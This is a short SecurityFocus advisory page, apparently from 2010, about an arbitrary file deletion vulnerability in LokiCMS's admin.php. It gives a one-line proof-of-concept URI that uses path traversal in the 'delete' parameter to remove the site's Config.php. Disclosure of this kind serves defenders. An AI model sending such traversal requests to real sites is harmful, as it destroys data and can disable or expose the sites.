info
discussion
exploit
solution
references
LokiCMS 'admin.php' Arbitrary File Deletion Vulnerability
Attackers can exploit this issue via a browser.
The following proof-of-concept URI is available:
http://www.example.com/admin.php?delete=../includes/Config.php
Privacy Statement
Copyright 2010, SecurityFocus
